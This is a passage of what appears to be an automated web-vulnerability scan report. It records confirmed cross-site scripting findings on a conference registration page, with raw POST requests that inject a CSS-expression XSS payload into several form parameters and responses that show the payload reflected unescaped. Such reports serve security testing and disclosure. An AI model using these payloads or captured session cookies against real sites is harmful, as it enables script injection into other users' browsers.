altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST " stYle="x:expre/**/ssion(alert(9))
reference POST 3
eb POST 3
admin POST -1
bridgeid POST 3
discountcode POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65413] POST 3
catpassword[65411] POST 3
catpassword[65421] POST 3
selectcategoryid POST 65407
catpassword[65407] POST 3
x POST 0
y POST 0 -----------------------------7db58107a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=5d1e6cf53a6a4e5f8e7156a6eb9bbdb5
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=giel3cuqdlsjta1b75fm6uii83
Content-Length: 1818
Accept-Encoding: gzip, deflate

--5d1e6cf53a6a4e5f8e7156a6eb9bbdb5
Content-Disposition: form-data; name="action"

preload_category
--5d1e6cf53a6a4e5f8e7156a6eb9bbdb5
Content-Disposition: form-data; name="eventid"

19301
--5d1e6cf53a6a4e5f8e7156a6eb9bbdb5
Content-Disposition: form-data; name="categoryid"

-1
--5d1e6cf53a6a4e5f8e7156a6eb9bbdb5
Content-Disposition: form-data; name="language"

" stYle="x:expre/**/ssion(netsparker(9))
--5d1e6cf53a6a4e5f8e7156a6eb9bbdb5
Content-Disposition: form-data; name="reference"

3
--5d1e6cf53a6a4e5f8e7156a6eb9bbdb5
Content-Disposition: form-data; name="eb"

3
--5d1e6cf53a6a4e5f8e7156a6eb9bbdb5
Content-Disposition: form-data; name="admin"

-1
--5d1e6cf53a6a4e5f8e7156a6eb9bbdb5
Content-Disposition: form-data; name="bridgeid"

3
--5d1e6cf53a6a4e5f8e7156a6eb9bbdb5
Content-Disposition: form-data; name="discountcode"

3
--5d1e6cf53a6a4e5f8e7156a6eb9bbdb5
Content-Disposition: form-data; name="catpassword[65419]"

3
--5d1e6cf53a6a4e5f8e7156a6eb9bbdb5
Content-Disposition: form-data; name="catpassword[65420]"

3
--5d1e6cf53a6a4e5f8e7156a6eb9bbdb5
Content-Disposition: form-data; name="catpassword[65413]"

3
--5d1e6cf53a6a4e5f8e7156a6eb9bbdb5
Content-Disposition: form-data; name="catpassword[65411]"

3
--5d1e6cf53a6a4e5f8e7156a6eb9bbdb5
Content-Disposition: form-data; name="catpassword[65421]"

3
--5d1e6cf53a6a4e5f8e7156a6eb9bbdb5
Content-Disposition: form-data; name="selectcategoryid"

65407
--5d1e6cf53a6a4e5f8e7156a6eb9bbdb5
Content-Disposition: form-data; name="catpassword[65407]"

3
--5d1e6cf53a6a4e5f8e7156a6eb9bbdb5
Content-Disposition: form-data; name="x"

0
--5d1e6cf53a6a4e5f8e7156a6eb9bbdb5
Content-Disposition: form-data; name="y"

0
-----------------------------7db58107a156e--
--5d1e6cf53a6a4e5f8e7156a6eb9bbdb5--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:25:12 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3188
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="3" /><!--Array( [catpass65407] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" ><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410"></label> </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409"></label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415"></label> $899.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419"></label> $399.00 </td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420"></label> </td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413"></label> </td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411"></label> </td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421"></label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65421]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" checked="checked" /></td><td><label for="c65407"></label> </td></tr><tr id="pass65407" ><td width="175" align="right" class="red">Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="3" size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST eng
reference POST " stYle="x:expre/**/ssion(alert(9))
eb POST 3
admin POST -1
bridgeid POST 3
discountcode POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65413] POST 3
catpassword[65411] POST 3
catpassword[65421] POST 3
selectcategoryid POST 65407
catpassword[65407] POST 3
x POST 0
y POST 0 -----------------------------7db58107a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=62e99b0fbaaa439f9e0623cecbeda60d
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=giel3cuqdlsjta1b75fm6uii83
Content-Length: 1820
Accept-Encoding: gzip, deflate

--62e99b0fbaaa439f9e0623cecbeda60d
Content-Disposition: form-data; name="action"

preload_category
--62e99b0fbaaa439f9e0623cecbeda60d
Content-Disposition: form-data; name="eventid"

19301
--62e99b0fbaaa439f9e0623cecbeda60d
Content-Disposition: form-data; name="categoryid"

-1
--62e99b0fbaaa439f9e0623cecbeda60d
Content-Disposition: form-data; name="language"

eng
--62e99b0fbaaa439f9e0623cecbeda60d
Content-Disposition: form-data; name="reference"

" stYle="x:expre/**/ssion(netsparker(9))
--62e99b0fbaaa439f9e0623cecbeda60d
Content-Disposition: form-data; name="eb"

3
--62e99b0fbaaa439f9e0623cecbeda60d
Content-Disposition: form-data; name="admin"

-1
--62e99b0fbaaa439f9e0623cecbeda60d
Content-Disposition: form-data; name="bridgeid"

3
--62e99b0fbaaa439f9e0623cecbeda60d
Content-Disposition: form-data; name="discountcode"

3
--62e99b0fbaaa439f9e0623cecbeda60d
Content-Disposition: form-data; name="catpassword[65419]"

3
--62e99b0fbaaa439f9e0623cecbeda60d
Content-Disposition: form-data; name="catpassword[65420]"

3
--62e99b0fbaaa439f9e0623cecbeda60d
Content-Disposition: form-data; name="catpassword[65413]"

3
--62e99b0fbaaa439f9e0623cecbeda60d
Content-Disposition: form-data; name="catpassword[65411]"

3
--62e99b0fbaaa439f9e0623cecbeda60d
Content-Disposition: form-data; name="catpassword[65421]"

3
--62e99b0fbaaa439f9e0623cecbeda60d
Content-Disposition: form-data; name="selectcategoryid"

65407
--62e99b0fbaaa439f9e0623cecbeda60d
Content-Disposition: form-data; name="catpassword[65407]"

3
--62e99b0fbaaa439f9e0623cecbeda60d
Content-Disposition: form-data; name="x"

0
--62e99b0fbaaa439f9e0623cecbeda60d
Content-Disposition: form-data; name="y"

0
-----------------------------7db58107a156e--
--62e99b0fbaaa439f9e0623cecbeda60d--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:25:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3411
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="3" /><!--Array( [catpass65407] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" ><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410">Training Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409">Conference Pass Only</label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415">Conference Pass (ECC Member ONLY)</label> $899.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65415&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419">Academic (Limited to 100)</label> $399.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65419&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420">Exhibition Only Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65420&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413">Press/ Media Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65413&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411">Presenter / Trainer</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65411&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421">Sponsors/ Exhibitors Pass</label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65421]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" checked="checked" /></td><td><label for="c65407">Crew</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65407&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65407" ><td width="175" align="right" class="red">Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="3" size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST eng
reference POST 3
eb POST " stYle="x:expre/**/ssion(alert(9))
admin POST -1
bridgeid POST 3
discountcode POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65413] POST 3
catpassword[65411] POST 3
catpassword[65421] POST 3
selectcategoryid POST 65407
catpassword[65407] POST 3
x POST 0
y POST 0 -----------------------------7db58107a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=91f65ef9496b45d3ab6f5a38e0bbdd1b
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=giel3cuqdlsjta1b75fm6uii83
Content-Length: 1820
Accept-Encoding: gzip, deflate

--91f65ef9496b45d3ab6f5a38e0bbdd1b
Content-Disposition: form-data; name="action"

preload_category
--91f65ef9496b45d3ab6f5a38e0bbdd1b
Content-Disposition: form-data; name="eventid"

19301
